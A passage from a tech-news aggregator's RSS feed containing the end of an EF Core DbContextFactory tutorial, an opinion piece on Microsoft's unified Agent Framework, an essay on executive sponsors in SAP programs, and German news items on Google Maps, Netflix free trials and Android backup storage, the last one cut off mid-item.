<p class="wp-block-paragraph">The following code snippet shows how you can register an instance of type <code>IDbContextFactory</code> as a singleton. You can safely call this code from any thread.</p>



<pre class="wp-block-code"><code>builder.Services.AddDbContextFactory(options =&gt;
    options.UseSqlServer(
        builder.Configuration.GetConnectionString("Default")));
</code></pre>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the solution</h2>



<p class="wp-block-paragraph">Now let’s see how we can put <code>IDbContextFactory</code> to work. The following code illustrates a class named <code>ProductService</code> that uses a factory to create <code>DbContext</code> instances for each scope of work.</p>



<pre class="wp-block-code"><code>public class ProductService
{
    private readonly IDbContextFactory _factory;
    public ProductService(IDbContextFactory factory)
        =&gt; _factory = factory;
    public async Task GetByIdAsync(int id)
    {
        await using var context = await _factory.CreateDbContextAsync();
        return await context.Products.FindAsync(id);
    }
    public async Task UpdateStockQuantityAsync(int id, int updateQuantity)
    {
        await using var context = await _factory.CreateDbContextAsync();
        var product = await context.Products.FindAsync(id);
        if (product is null) return;
        product.Quantity += updateQuantity;
        await context.SaveChangesAsync();
    }
}
</code></pre>



<p class="wp-block-paragraph">Note that <code>ProductService</code> has two methods, <code>GetByIdAsync</code> and <code>UpdateStockQuantityAsync</code>. An instance of the <code>DbContext</code> class is created locally in each of these methods. Now, suppose you have two threads, T1 and T2, that execute these methods concurrently. That is, thread T1 executes the <code>GetByIdAsync</code> method while thread T2 executes the <code>UpdateStockQuantityAsync</code> method. Because each of these methods is executed in isolation, they will have their own context, connection, and change-tracking information, and there will be no mutable state, so you don’t need to implement thread synchronization in either of these methods.</p>



<p class="wp-block-paragraph">Consider the following code that executes a read operation and an update operation in two separate tasks. </p>



<pre class="wp-block-code"><code>public static async Task RunMethodsInParallelAsync(ProductService productService)
{
      Task readTask = productService.GetByIdAsync(1);
      Task updateTask = productService.UpdateStockQuantityAsync(3, 5);
      await Task.WhenAll(readTask, updateTask);
      Product? product = await readTask;
 }
</code></pre>



<p class="wp-block-paragraph">The <code>Task.WhenAll</code> method runs the two tasks in parallel and waits until both have finished. The reason this approach is thread-safe, and will not create concurrency errors, is that each of these two methods creates its own <code>DbContext</code> instance internally. Therefore the read operation and the update operation use independent <code>DbContext</code> instances.</p>



<h2 class="wp-block-heading">Use DbContext pooling to reduce allocation cost</h2>



<p class="wp-block-paragraph">Although creating <code>DbContext</code> instances is not that costly, you should consider using pooled contexts in applications that require high scalability and high performance. The following code snippet shows how you can register a pooled context. </p>



<pre class="wp-block-code"><code>builder.Services.AddPooledDbContextFactory(options =&gt;
    options.UseSqlServer(connectionString));
</code></pre>



<p class="wp-block-paragraph">A call to <code>AddDbContext()</code> will register a <code>DbContext</code> instance as scoped per HTTP request. Each request will run on a different thread and each will have its own context. However, keep in mind that the default scoped registration of the <code>DbContext</code> will not always suffice.</p>



<p class="wp-block-paragraph">You will need a factory to create instances of <code>DbContext</code> when you’re using a background service, or performing some work inside a particular request, or running some business logic operation over multiple contexts.</p>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li>If you use EF Core in the data access layer of your application, you must implement thread safety measures whenever you run your queries in parallel.</li>



<li>You cannot execute multiple queries in parallel in EF Core using the same <code>DbContext</code> instance.</li>



<li>The <code>IDbContextFactory</code> enables you to create a <code>DbContext</code> instance for each thread, thereby enabling you to work with these instances in isolation.</li>



<li>Although using a <code>DbContext</code> pool involves a small allocation overhead, it becomes a non-issue if you need high throughput.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Microsoft agent framework wars are over. The real architecture decision starts now]]></title>
<description><![CDATA[Over the past year, I had the same conversation with almost every team starting an AI initiative. Should we build on Semantic Kernel, AutoGen or Foundry?



At first it felt like the most important architectural decision we’d make. Each framework had its own philosophy, each promised to be the fo...]]></description>
<link>https://tsecurity.de/de/3691079/ai-nachrichten/the-microsoft-agent-framework-wars-are-over-the-real-architecture-decision-starts-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691079/ai-nachrichten/the-microsoft-agent-framework-wars-are-over-the-real-architecture-decision-starts-now/</guid>
<pubDate>Fri, 24 Jul 2026 11:04:58 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past year, I had the same conversation with almost every team starting an AI initiative. Should we build on Semantic Kernel, AutoGen or Foundry?</p>



<p class="wp-block-paragraph">At first it felt like the most important architectural decision we’d make. Each framework had its own philosophy, each promised to be the foundation for enterprise AI, and picking the wrong one felt like an expensive mistake. I spent a lot of time helping teams weigh the trade-offs.</p>



<p class="wp-block-paragraph">Looking back, I think we were asking the wrong question. I certainly was.</p>



<p class="wp-block-paragraph">I watched teams spend months debating SDKs while the decisions that actually decided whether their applications survived production went unexamined. Some built elaborate orchestration layers for workflows that a few deterministic functions would have handled. Others avoided agent frameworks entirely and later found they’d designed themselves into a corner.</p>



<p class="wp-block-paragraph">Then Microsoft settled it for us. It <a href="https://learn.microsoft.com/en-us/agent-framework/overview/">introduced the unified Agent Framework</a>, quietly moved Semantic Kernel and AutoGen into <a href="https://devblogs.microsoft.com/agent-framework/migrate-your-semantic-kernel-and-autogen-projects-to-microsoft-agent-framework-release-candidate/">maintenance mode</a>, and the debate I’d spent months refereeing was suddenly over. Turns out the answer to “which of the three” was “none of the three, here’s a fourth.” The framework hit version 1.0 and general availability in April 2026, stable across .NET and Python.</p>



<p class="wp-block-paragraph">What surprised me wasn’t the decision. It was how fast a debate that had eaten so much of our attention stopped mattering. Microsoft changed the menu.</p>



<p class="wp-block-paragraph">It didn’t change the meal.</p>



<h2 class="wp-block-heading">The framework was never the hard part</h2>



<p class="wp-block-paragraph">Framework selection dominated almost every early conversation I had about enterprise agents. Which SDK do we standardize on? Which orchestration model gives us the most flexibility? Which one is Microsoft actually betting on?</p>



<p class="wp-block-paragraph">Fair questions. But after a year of watching these projects play out, I’ve slowly come around to a different view. Those weren’t the questions that decided anything.</p>



<p class="wp-block-paragraph">The first question I ask now is much smaller. Does this thing actually need an agent?</p>



<p class="wp-block-paragraph">It sounds obvious, and I still get it wrong sometimes. But it’s the mistake I see most. On one project, a team spent weeks designing a multi-agent workflow for a process that ran the same four steps every time: read a document, validate it, call an API, send a notification. The diagrams looked great. The system in production didn’t. A few well-tested functions would have been easier to build, easier to maintain and a lot easier to trust.</p>



<p class="wp-block-paragraph">Part of this is just that “<strong>agent</strong>” has become the word everyone reaches for. Sometimes it’s the right call. Sometimes it’s a workflow we already knew how to build, wearing a newer label. An agent earns its complexity when it genuinely has to decide things you can’t predetermine, choosing between tools, adapting to what it finds, working out its own next step. If you already know every step, you have a workflow, and a workflow is usually the better engineering choice. The consolidation didn’t change that. It just made it easier to see.</p>



<h2 class="wp-block-heading">What building production agents actually taught me</h2>



<p class="wp-block-paragraph">Once I stopped fixating on frameworks, the same three problems kept showing up. None of them had anything to do with the SDK.</p>



<h3 class="wp-block-heading">Context beats model choice</h3>



<p class="wp-block-paragraph">Early on I spent a lot of time comparing models, the way you’d agonize over a restaurant menu and then order what you always order. Now I spend most of it thinking about context, which is far less fun and far more useful.</p>



<p class="wp-block-paragraph">I’ve watched good models fail because they were handed too much, not too little. One team I worked with gave the model access to nearly every internal document they had on the theory that more information meant better answers. It went the other way. Responses got slower, less consistent and sometimes skipped right past the thing that actually mattered. When we cut the context down to only what the task needed, the quality jumped almost immediately. I didn’t predict that. It taught me to be suspicious of “just give it everything.”</p>



<p class="wp-block-paragraph">The best agent systems I’ve worked on weren’t the ones with the biggest context windows. They were the ones careful about what reached the model, and when. That’s not something the framework hands you.</p>



<h3 class="wp-block-heading">Failure is where the real work is</h3>



<p class="wp-block-paragraph">Most agent demos look great because they’re built around the happy path. Production doesn’t extend that courtesy.</p>



<p class="wp-block-paragraph">I remember a project where everything held up in testing. Then a downstream API timed out after the agent had already completed several earlier steps. We couldn’t just restart, because part of the business process had already gone through. We ended up spending far more time on recovery logic than we ever spent on prompts. That project changed how I think about this work. The hard part was never getting the model to make a decision. It was making sure the system didn’t fall apart when reality refused to follow the script.</p>



<p class="wp-block-paragraph">Tool calls fail partway through. APIs return inconsistent data. Models call the same tool over and over because the last answer wasn’t what they wanted. That’s not the exception; that’s a normal Tuesday. Whether you retry, roll back, pause for a human or push on with partial results is a judgment call, and no framework is going to make it for you.</p>



<h3 class="wp-block-heading">Identity is the real security boundary</h3>



<p class="wp-block-paragraph">This one surprised me most. The moment an agent stops being a chatbot and starts touching real business systems, identity matters more than orchestration.</p>



<p class="wp-block-paragraph">Every project gets to the same question eventually. Who is this agent actually acting as? The developer’s credentials? A service account? The user who asked? Get it wrong and you’ve built something autonomous running with more access than any single person should have, which is exactly the kind of thing that looks fine until an audit. The Agent Framework, like most modern tooling, makes it easier to wire agents to tools through standards like the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. That helps. But where human approval belongs, what needs extra authorization, how much rope to give the thing, those are still yours to decide.</p>



<h3 class="wp-block-heading">The surprises weren’t technical</h3>



<p class="wp-block-paragraph">Here’s what I didn’t see coming. The hardest part of last year wasn’t technical at all. It was organizational. The moment a team heard “agent,” expectations shifted under everyone’s feet. Business stakeholders started expecting full autonomy. Developers assumed the thing could reason its way through anything. People started designing for flexibility before we’d even agreed on what problem we were solving. The word did damage before any code did. I found myself spending as much time resetting expectations as I did discussing architecture.</p>



<h2 class="wp-block-heading">Build for change, not for today’s winner</h2>



<p class="wp-block-paragraph">I don’t think the teams that struggled last year picked the wrong framework. Semantic Kernel was reasonable. AutoGen was reasonable. Foundry made sense for plenty of cases. I’d have signed off on any of them.</p>



<p class="wp-block-paragraph">The ones that got hurt put all their eggs in one framework, treating it as the foundation of the whole system instead of as one more dependency. Microsoft provided a migration path. But teams that had tightly coupled their applications to framework-specific abstractions discovered that migrating and rewriting are not the same thing. That wasn’t Microsoft’s doing. It was their own architecture’s. The teams that moved easily had kept their business logic, prompts and orchestration loose enough to evolve independently of any one SDK. For them, the change was a manageable project, not a teardown.</p>



<p class="wp-block-paragraph">For what it’s worth, nobody I work with is treating this as an emergency. Most are moving the smaller workloads first, watching how they behave and leaving the production-critical systems alone until they actually understand the new abstractions. That’s the right instinct. And I doubt this is the last consolidation we’ll see, the ecosystem is still young, frameworks will keep absorbing each other and over time the differences between them will be operational more than architectural.</p>



<p class="wp-block-paragraph">I don’t regret the framework debates, honestly. They were reasonable at the time. What changed wasn’t Microsoft’s roadmap.</p>



<p class="wp-block-paragraph">It was mine. Watching these systems run in production taught me that the framework is the easiest piece to swap out. Recovery logic, context management, security boundaries, the business workflow itself, those stay with you long after today’s SDK gets replaced by tomorrow’s.</p>



<p class="wp-block-paragraph">So, Microsoft made one decision easier by turning three frameworks into one. Good. Five years from now we’ll be on different tools, and we’ll still be asking the same handful of questions.</p>



<p class="wp-block-paragraph">Does this actually need an agent? Does it have the right context? Can it recover when something breaks, because something will? Is it acting as the right person?</p>



<p class="wp-block-paragraph">Those questions outlast every rewrite. That’s where I’ve learned to put my effort.</p>



<p class="wp-block-paragraph">Frameworks come and go. Good architecture has to survive all of them.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.infoworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Maps bekommt jetzt das beeindruckendste Update seit Jahren]]></title>
<description><![CDATA[Es ist soweit, Google hat damit begonnen, das wohl größte Google-Maps-Update seit vielen Jahren an die ersten Nutzer auszuliefern, wie Androidpolice berichtet. Damit ändert sich die Kartenansicht, aber auch die Bedienung der Navigations-App entscheidend.



Vereinfacht gesagt: Google Maps präsent...]]></description>
<link>https://tsecurity.de/de/3691070/it-nachrichten/google-maps-bekommt-jetzt-das-beeindruckendste-update-seit-jahren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691070/it-nachrichten/google-maps-bekommt-jetzt-das-beeindruckendste-update-seit-jahren/</guid>
<pubDate>Fri, 24 Jul 2026 11:03:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Es ist soweit, Google hat damit begonnen, <a href="https://www.pcwelt.de/article/3087745/das-groesste-google-maps-update-seit-jahren-so-profitieren-viele-davon-aber-nicht-alle.html" target="_blank" rel="noreferrer noopener">das wohl größte Google-Maps-Update seit vielen Jahren </a>an die ersten Nutzer auszuliefern, wie Androidpolice <a href="https://www.androidpolice.com/huge-google-maps-upgrade-rolling-out-on-android-auto/">berichtet</a>. Damit ändert sich die Kartenansicht, aber auch die Bedienung der Navigations-App entscheidend.</p>



<p>Vereinfacht gesagt: Google Maps präsentiert sich nun immersiver, um das beliebte Modewort zu verwenden, und mit viel 3D. Man schaut jetzt nicht mehr <strong>auf </strong>die Karten, sondern <strong>in </strong>die Karten beziehungsweise in die Häuserschluchten hinein. Das soll diese sogenannte „Immersive Navigation“ das Wiedererkennen von Gebäuden oder Brücken, unter denen Sie in der App erkennbar durchfahren, und von Landschaftsmerkmalen vor Ort erleichtern, damit Sie sich leichter orientieren können.</p>



<p>Speziell die 3D-Ansicht der Karten während der Navigation sieht durchaus beeindruckend aus. Ob sich damit tatsächlich die Navigation erleichtert oder das Ganze den Fahrer vielleicht sogar eher ablenkt, wie <a href="https://www.googlewatchblog.de/2026/07/google-maps-navigation-riesiges-update-bringt-voellig-neues-immersive-design-und-funktionen-galerie/">einige </a>kritisieren, muss jeder selbst entscheiden. In jedem Fall wirken die Gebäude und das Gelände realistischer. Einzelne Fahrspuren, aber auch Ampeln oder Stoppschilder sind gut zu erkennen. In diesem Zusammenhang sollen Fahrer mit einem verbesserten Zoom auch besser vorausschauen können.</p>



<p>Google will zudem die Sprachanweisungen verbessert haben. Sie sollen jetzt natürlicher klingen, wie Anweisungen von einem Beifahrer: „Fahren Sie an dieser Ausfahrt vorbei und nehmen Sie die nächste Ausfahrt für XY.“ Zu angebotenen Alternativrouten liefert Google Maps zudem Detailinformationen, die bei der Entscheidungsfindung helfen sollen. Beispielsweise ob auf der Alternativroute weniger Verkehr ist, die Strecke dafür aber länger.</p>



<p>Befinden Sie sich dann kurz vor dem Ziel, dann zeigt Google Maps eine Streetview-Vorschau, damit Sie Ihr Ziel sofort in der Realität erkennen. Falls Sie als Ziel eine Hausnummer angegeben haben, sollte Google Maps den dazugehörigen Hauseingang anzeigen. Mit etwas Glück bekommen Sie sogar eine Parkempfehlung.</p>



<h2 class="wp-block-heading">Wer bekommt jetzt das neue Google Maps?</h2>



<p>Grundsätzlich will Google das neue Google Maps für alle unterstützten Plattformen und für alle Länder ausliefern. Dafür schaltet Google die “Immersive Navigation” serverseitig frei. Los geht es jetzt aber auf Android und iOS sowie auf Android Auto und Apple Carplay nur in den USA. Wann „Immersive Navigation“ nach Deutschland kommt, ist noch unbekannt.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sponsor mismatch is the silent killer of enterprise transformation]]></title>
<description><![CDATA[Late in a large enterprise SAP transformation, the strategic governance conversations began to drift. Instead of executive decisions, we found ourselves debating whether the program needed dedicated testing, whether cutover required a full weekend, whether twenty Agile teams really needed coordin...]]></description>
<link>https://tsecurity.de/de/3691067/it-nachrichten/sponsor-mismatch-is-the-silent-killer-of-enterprise-transformation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691067/it-nachrichten/sponsor-mismatch-is-the-silent-killer-of-enterprise-transformation/</guid>
<pubDate>Fri, 24 Jul 2026 11:03:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Late in a large enterprise SAP transformation, the strategic governance conversations began to drift. Instead of executive decisions, we found ourselves debating whether the program needed dedicated testing, whether cutover required a full weekend, whether twenty Agile teams really needed coordination support and whether offshore resources were adding value at all.</p>



<p class="wp-block-paragraph">The questions were not coming from the delivery teams. They were coming from the executive sponsor.</p>



<p class="wp-block-paragraph">The sponsor had recently been elevated into a senior leadership role and had never sponsored a technology transformation at this scale. The challenge was not authority. The sponsor had every right to ask any question they wanted. The challenge was that strategic governance had quietly turned into a debate about delivery practices, because the sponsor did not yet have the transformation context to focus the conversation anywhere else.</p>



<p class="wp-block-paragraph">This is not a story about a bad sponsor. The executive in this case was a capable senior leader with strong judgment and authentic intent. They had been placed into a role they had not yet been prepared for, and the pattern that followed was structural, not personal. It is one of the more common patterns I have observed across enterprise transformation programs, and one of the most consistently misdiagnosed.</p>



<p class="wp-block-paragraph">Most program failures are not execution failures. They are sponsor mismatches.</p>



<h2 class="wp-block-heading">When governance becomes a debate about delivery practices</h2>



<p class="wp-block-paragraph">When the sponsor does not understand what an enterprise transformation actually requires, governance forums stop functioning as decision bodies and start functioning as practice debates.</p>



<p class="wp-block-paragraph">You see it in the questions that get asked. Why do we need a dedicated testing phase? Can the Build timeline be compressed? Why does cutover need a full weekend? Why do we need more Scrum Masters across 20 product teams? Can the US team simply work longer hours instead of using offshore resources? On one program, the sponsor suggested shifting the entire project’s working hours to India time, despite roughly 85 percent of the delivery organization being based in the United States.</p>



<p class="wp-block-paragraph">None of these questions are unreasonable in isolation. Each one targets a real cost or timeline pressure. The problem is what is missing underneath them: an understanding of the operational risks the original choices were designed to mitigate.</p>



<p class="wp-block-paragraph">When sponsors ask delivery-practice questions without that context, the program leadership team ends up defending the work instead of advancing it. Decision velocity drops. Trust between the program and its sponsor erodes. Senior delivery talent disengages from governance forums where the conversation never reaches the decisions they need made. What looks from the outside like an active sponsor producing engagement is, from inside the program, an active drain on the cycles needed to deliver.</p>



<p class="wp-block-paragraph">The compounding cost is not unique to any single program. <a href="https://www.pmi.org/blog/why-executive-sponsorship-fuels-projects">PMI’s research on executive sponsorship</a> consistently identifies sponsor engagement quality, rather than sponsor presence alone, as one of the strongest predictors of project success. The visible symptom is debate. The actual cost is unmade decisions.</p>



<h2 class="wp-block-heading">Authority is rarely the issue. Literacy is</h2>



<p class="wp-block-paragraph">When transformations stall under a mismatched sponsor, the diagnostic instinct is to question the sponsor’s authority. Are they senior enough? Do they have the cross-functional reach? Can they unblock?</p>



<p class="wp-block-paragraph">In most of the programs I have led or advised, authority was not the limiting factor. The sponsor in the SAP program above had ample authority. They could unblock any decision the program needed. What had not been developed was the transformation literacy to know which decisions mattered, which were technical noise and which were execution risks that should not be optimized away.</p>



<p class="wp-block-paragraph">This is what I have come to think of as the literacy problem. Sponsors elevated into transformation roles often have deep functional expertise (finance, operations, business unit leadership) but limited exposure to the distinct functions of PMO, organizational change management, agile delivery, testing and cutover, and how each one reduces a specific category of implementation risk. They are not expected to be SAP configuration experts. But they need enough transformation literacy to recognize which questions actually belong in a steering committee.</p>



<p class="wp-block-paragraph"><a href="https://hbr.org/2015/05/how-to-be-an-effective-executive-sponsor">Harvard Business Review’s research on effective executive sponsorship</a> has emphasized that sponsorship effectiveness depends as much on judgment as on authority. Judgment is where literacy becomes operational. A sponsor with authority but limited transformation literacy will optimize for speed and cost in ways that consistently underestimate risk. A sponsor with both will make the tradeoffs the program actually needs.</p>



<p class="wp-block-paragraph"><a href="https://www.prosci.com/resources/articles/change-management-best-practices">Prosci’s longstanding benchmark studies on change management</a> have ranked active and visible executive sponsorship as the single greatest contributor to change success for two decades. The word that matters in that finding is active. Active sponsorship without transformation literacy can introduce real cost. Not because the sponsor is acting against the program, but because the optimization choices they make are based on incomplete information about what the program is built to protect against.</p>



<h2 class="wp-block-heading">Shift the conversation from delivery practices to business risk</h2>



<p class="wp-block-paragraph">When the sponsor relationship is already in place and cannot be changed, the program leadership team has one move that consistently works: shift the conversation.</p>



<p class="wp-block-paragraph">On the SAP program above, we stopped explaining why the testing phase existed. We started explaining the business risk of reducing it. We stopped debating the number of Scrum Masters. We started connecting delivery capacity to coordination across more than twenty Agile teams and the business cost of losing that coordination. We reframed offshore support as a way to maintain delivery momentum around the clock rather than asking the U.S. team to sustain fifteen-hour days.</p>



<p class="wp-block-paragraph">The shift is from defending delivery practice to explaining business risk. The sponsor does not need to understand why testing takes the time it does. They need to understand what the program is exposed to if testing is compressed. They do not need to know how many Scrum Masters are statistically optimal for twenty Agile teams. They need to know what coordination breaks when the number is wrong.</p>



<p class="wp-block-paragraph">This reframing accomplishes two things. First, it brings the conversation back to the level at which sponsors actually make decisions: tradeoffs between business outcomes and business risks. Second, it builds transformation literacy in the sponsor over time, almost as a byproduct. By the third or fourth iteration of business-risk-framed conversations, the sponsor begins to ask the right questions on their own.</p>



<p class="wp-block-paragraph">In practice, this happens through small but deliberate moves. When the sponsor asks why a phase needs the time it takes, the program lead names two or three things that could go wrong if the time is cut and what each would cost the business. When the sponsor asks why a role is needed, the program lead names the work that would not get done without it. Every delivery-practice question gets converted into a business-risk answer.</p>



<p class="wp-block-paragraph">The program leadership team’s job is not to make the sponsor an expert in SAP delivery. It is to provide enough transformation context so that executive decisions reflect both business priorities and implementation realities.</p>



<p class="wp-block-paragraph">There are a few phrases I have used with executive sponsors over the years that capture the underlying issue. The sharpest one:</p>



<h2 class="wp-block-heading">If the decision has to go above the sponsor, they are not the sponsor.</h2>



<p class="wp-block-paragraph">Sponsorship is defined by what the sponsor can decide without asking someone else. That is the test. Anything else is the appearance of sponsorship, not the substance.</p>



<p class="wp-block-paragraph">For CIOs supporting enterprise transformation, the implication is direct. Sponsor selection, or sponsor preparation when selection is not an option, is not a hierarchy question. It is a transformation capability question. The same execution discipline that goes into defining decision rights, structuring governance and protecting delivery momentum should apply, with equal rigor, to assessing sponsor fit and building sponsor literacy before the program begins.</p>



<p class="wp-block-paragraph">A sponsor does not need to be the technical expert. They do need to know when to trust the people who are.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix testet wieder kostenlose Probeabos – bis zu 30 Tage gratis]]></title>
<description><![CDATA[Ein Netflix-Abo hat mittlerweile so gut wie jeder, doch der eine oder andere wartet vielleicht noch auf eine Möglichkeit, das Streaming-Angebot kostenlos zu testen. Das war seit den Anfängen von Netflix nicht mehr möglich, doch jetzt gibt es wieder einen kostenlosen Probezeitraum.



Bis zu 30 Ta...]]></description>
<link>https://tsecurity.de/de/3691064/it-nachrichten/netflix-testet-wieder-kostenlose-probeabos-bis-zu-30-tage-gratis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691064/it-nachrichten/netflix-testet-wieder-kostenlose-probeabos-bis-zu-30-tage-gratis/</guid>
<pubDate>Fri, 24 Jul 2026 11:03:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein Netflix-Abo hat mittlerweile so gut wie jeder, doch der eine oder andere wartet vielleicht noch auf eine Möglichkeit, das Streaming-Angebot kostenlos zu testen. Das war seit den Anfängen von Netflix nicht mehr möglich, doch jetzt gibt es wieder einen kostenlosen Probezeitraum.</p>



<p>Bis zu 30 Tage können Sie den Streamingtest jetzt kostenlos nutzen. Teilweise werden auch nur 14 Tage angeboten, der Gratis-Zeitraum scheint also je nach Standort oder genutztem Browser zu variieren. Auf der Webseite von <a href="https://www.netflix.com/de/" target="_blank" rel="noreferrer noopener">Netflix Deutschland</a> wurden uns auch nur 14 Tage für 0 Euro angezeigt. Es kann aber helfen, wenn Sie auf ein anderes Gerät wechseln oder Cookies löschen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632a1fb8d37"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_742287.png?w=1200" alt="" class="wp-image-3197988" width="1200" height="562" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure></div>



<p><strong>Wichtig:</strong> Das Angebot gilt explizit nur für Neukunden, nicht für wiederkehrende Abonnenten. Allerdings ist es recht einfach, diesen Umstand zu umgehen, wenn Sie sich einfach mit einer anderen E-Mail-Adresse als zuvor registrieren. Dann haben Sie zwar keinen Zugriff auf Ihren alten Account inklusive persönlicher Daten, Listen und Streaming-Historie, doch das ist sicher zu verschmerzen.</p>



<p>Nach Ablauf des Probezeitraums müssen Sie sich für ein Abo entscheiden (oder vorher kündigen). Zur Wahl stehen<strong> Standard mit Werbung</strong> für 4,99 Euro monatlich, <strong>Standard</strong> ohne Werbung für 13,99 Euro monatlich oder <strong>Premium</strong> für 19,99 Euro monatlich.<a href="https://karrierewelt.golem.de/products/ldap-identitatsmanagement-fundamentals-virtueller-drei-tage-workshop"></a></p>



<p>Warum genau Netflix gerade jetzt ein Probe-Abo wieder einführt, ist nicht ganz klar. Vermutlich versucht der Anbieter aber, neue Abonnenten dazu zu gewinnen, nachdem die Zahlen zuletzt stagnierten. Zwar ist Netflix der größte Anbieter für Streaming, doch die Konkurrenz schläft nicht. Seit Januar 2026 gibt es beispielsweise auch <a href="https://www.pcwelt.de/article/1186579/hbo-max-in-deutschland-sehen-so-gehts.html" target="_blank" rel="noreferrer noopener">HBO Max in Deutschland</a>, das mit großen Namen wie<em> Game of Thrones, House of the Dragon, Harry Potter </em>oder <em>Superman </em>wirbt<em>.</em></p>



<p><a href="https://www.pcwelt.de/article/1158913/streaming-vergleich-netflix-prime-video-disney-co.html" target="_blank" rel="noreferrer noopener">Eine Übersicht aller wichtigen Streaming-Dienste finden Sie hier</a>, inklusive Preisen, Vorteilen und Nachteilen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern kein Gratis-Backup mehr: Schonfrist von 45 Tagen]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3691045/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691045/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</guid>
<pubDate>Fri, 24 Jul 2026 10:50:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer gilt die Änderung seit dem<strong> 7. Juli 2026</strong>. Für bestehende Nutzer gilt eine Schonfrist von <strong>45 Tagen</strong>, bis sie in Kraft tritt. Google informiert Nutzer per Mail dazu:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Wir möchten dich über eine bevorstehende Aktualisierung unserer Speicherrichtlinien informieren. Außerdem führen wir neue Steuerelemente ein, mit denen du deine Android-Sicherungen besser verwalten kannst.</p>



